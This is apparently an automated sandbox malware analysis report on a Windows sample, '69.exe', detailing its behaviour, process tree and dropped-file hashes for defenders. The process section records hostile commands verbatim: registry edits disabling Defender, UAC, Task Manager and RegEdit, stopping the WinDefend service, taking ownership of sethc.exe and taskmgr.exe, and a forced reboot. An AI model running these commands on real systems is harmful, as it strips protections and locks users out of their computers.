Malware Analysis Report

2024-12-07 14:34

Sample ID 240921-xszn8aybqe
Target 69.exe
SHA256 6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
Tags
discovery evasion execution exploit persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7

Threat Level: Known bad

The file 69.exe was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution exploit persistence ransomware trojan

UAC bypass

Possible privilege escalation attempt

Stops running service(s)

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Loads dropped DLL

Modifies system executable filetype association

Modifies file permissions

Executes dropped EXE

Enumerates connected drives

Drops file in System32 directory

Sets desktop wallpaper using registry

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: CmdExeWriteProcessMemorySpam

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-21 19:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-21 19:07

Reported

2024-09-21 19:08

Platform

win7-20240729-en

Max time kernel

7s

Max time network

7s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\PerfLogs\windows\exec.exe N/A
N/A N/A C:\PerfLogs\windows\jumpscare.exe N/A
N/A N/A C:\PerfLogs\windows\rnbowspam.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" C:\Windows\system32\reg.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\V: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\N: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\L: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\P: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\T: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\U: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\X: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\H: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\G: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\K: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Q: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\S: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\A: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\E: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\I: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\J: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\M: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\O: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\R: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\W: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\B: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Z: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Y: C:\Program Files\Windows Media Player\wmplayer.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\reg.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\taskmgr.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\sethc.exe C:\Windows\system32\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\PerfLogs\\windows\\creepy69.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\regedit.exe C:\Windows\system32\cmd.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\69.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PerfLogs\windows\exec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PerfLogs\windows\jumpscare.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PerfLogs\windows\rnbowspam.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" C:\Windows\system32\reg.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\PerfLogs\windows\jumpscare.exe N/A
N/A N/A C:\PerfLogs\windows\rnbowspam.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: 33 N/A C:\Program Files\Windows Media Player\wmplayer.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\Windows Media Player\wmplayer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Windows Media Player\wmplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe
PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe
PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe
PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe
PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe
PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe
PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe
PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe
PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe
PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe
PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe
PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe
PID 1676 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1276 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1276 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1276 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2376 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Media Player\wmplayer.exe
PID 2376 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Media Player\wmplayer.exe
PID 2376 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Media Player\wmplayer.exe
PID 1276 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1276 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1276 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1676 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 760 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 760 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 760 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1676 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1676 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1676 wrote to memory of 604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1676 wrote to memory of 604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1676 wrote to memory of 604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69.exe

"C:\Users\Admin\AppData\Local\Temp\69.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"

C:\PerfLogs\windows\exec.exe

"C:\PerfLogs\windows\exec.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat C:\PerfLogs\windows\exec.exe"

C:\PerfLogs\windows\jumpscare.exe

jumpscare.exe

C:\PerfLogs\windows\rnbowspam.exe

rnbowspam.exe

C:\Windows\System32\takeown.exe

takeown /f taskmgr.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\jumpscare.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\rnbowspam.exe"

C:\Windows\System32\takeown.exe

takeown /f sethc.exe

C:\Windows\System32\icacls.exe

icacls "sethc.exe" /granted "Admin":F

C:\Program Files\Windows Media Player\wmplayer.exe

wmplayer.exe "C:\PerfLogs\windows\tape.mp4"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K rainbow.bat

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\System32\icacls.exe

icacls "taskmgr.exe" /granted "Admin":F

C:\Windows\System32\takeown.exe

takeown /f reg.exe

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\System32\icacls.exe

icacls "reg.exe" /granted "Admin":F

C:\Windows\system32\takeown.exe

takeown /f regedit.exe

C:\Windows\system32\icacls.exe

icacls "regedit.exe" /granted "Admin":F

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K rainbow.bat

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start=disabled

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\shutdown.exe

shutdown -r -t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K rainbow.bat

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1479522427372120-82456797910118033231390140125-4662704141658235516-1118853509"

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1

Network

N/A

Files

C:\PerfLogs\windows\warn.vbs

MD5 2f1738d26b35388f87f905ecc98cf408
SHA1 f1d20ac33b739f3d50d30891b743ef4374abbc5f
SHA256 83a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba
SHA512 e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2

C:\PerfLogs\windows\exec.exe

MD5 236f1bc0ecb98edb8efdc31da513e819
SHA1 47cc4e73c0f6d717eba708cf468bf6ecb9970086
SHA256 517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4
SHA512 e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109

C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat

MD5 47814c389b7e63ed5a13aa8dcc435f23
SHA1 06f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7
SHA256 2e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48
SHA512 0cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382

C:\PerfLogs\windows\jumpscare.exe

MD5 5425f894a45d90bac30ff9a34d2ad2f3
SHA1 3d9b9708b4eb917142e7fb59ba61534db2c84e7b
SHA256 5f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2
SHA512 9cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7

C:\PerfLogs\windows\rnbowspam.exe

MD5 e000d863f54529348b39030cbaf19aad
SHA1 9138d2cb83508bf24edee9cb581f60700a1c2b9b
SHA256 5fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea
SHA512 72dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df

C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat

MD5 517cae8cc74a0ef3cff3ca7f7dc1aa34
SHA1 af1538a03dfa1678ab2117c715682527e22f2450
SHA256 a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194
SHA512 8180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573

C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat

MD5 5b094d5e0e750e15ab5628f608756249
SHA1 c73caec179b8baf3833413aaab31c384c48ccd45
SHA256 5ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f
SHA512 5d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d

C:\PerfLogs\windows\rainbow.bat

MD5 9d25a94b77c178f0d19bdd8440aaaade
SHA1 c732a091461e0ebbd69f6f64b70016e13856908c
SHA256 55163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9
SHA512 e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d

C:\PerfLogs\windows\killrunas.vbs

MD5 fb63b21fb318509a75324b1037da7876
SHA1 ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1
SHA256 3917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05
SHA512 03ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1

C:\PerfLogs\windows\logon_overwrte.exe

MD5 f8df0742068fa14d5a4502de32acf41b
SHA1 f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0
SHA256 9eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc
SHA512 e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186

C:\PerfLogs\windows\69rnspam.exe

MD5 727793378d36b60cae54319b2f5e9e4d
SHA1 2171ea2f0ea01b39c71ea216a945816fa9ffe751
SHA256 b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2
SHA512 66855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91

C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt

MD5 a6ef45b0aa8443dfea5daaa1bac6a671
SHA1 b27edc165fd8c892af4442698e623d14dfa87899
SHA256 6ba4272a0155f90dc9ffb4777d0e6d167372dfba847992ba77b6ebfb7d234ac2
SHA512 13762ea017e67b1a5d42684ad149bc7aa32c0dad80bd287868ba401d44bfbe5c13ec1ee7d0ffcbcd88abfebe38bf1e8f9a5142297d5860ddbd7466d619a7b1de

C:\PerfLogs\windows\tape.mp4

MD5 3784764b2a5db2e23e744eaff79f40c8
SHA1 33994de53dcf82b834961421b863181763166954
SHA256 2234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf
SHA512 f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f

memory/1424-110-0x0000000004760000-0x000000000476A000-memory.dmp

memory/1424-108-0x0000000004760000-0x000000000476A000-memory.dmp

memory/1424-129-0x0000000004550000-0x0000000004750000-memory.dmp

memory/1424-138-0x0000000004F90000-0x0000000004F9A000-memory.dmp

memory/1424-128-0x0000000004550000-0x0000000004750000-memory.dmp

memory/1424-163-0x0000000005600000-0x000000000560A000-memory.dmp

memory/1424-162-0x0000000005600000-0x000000000560A000-memory.dmp

memory/1424-125-0x0000000004550000-0x0000000004750000-memory.dmp

memory/1424-107-0x0000000004390000-0x000000000439A000-memory.dmp

memory/1424-106-0x0000000004390000-0x000000000439A000-memory.dmp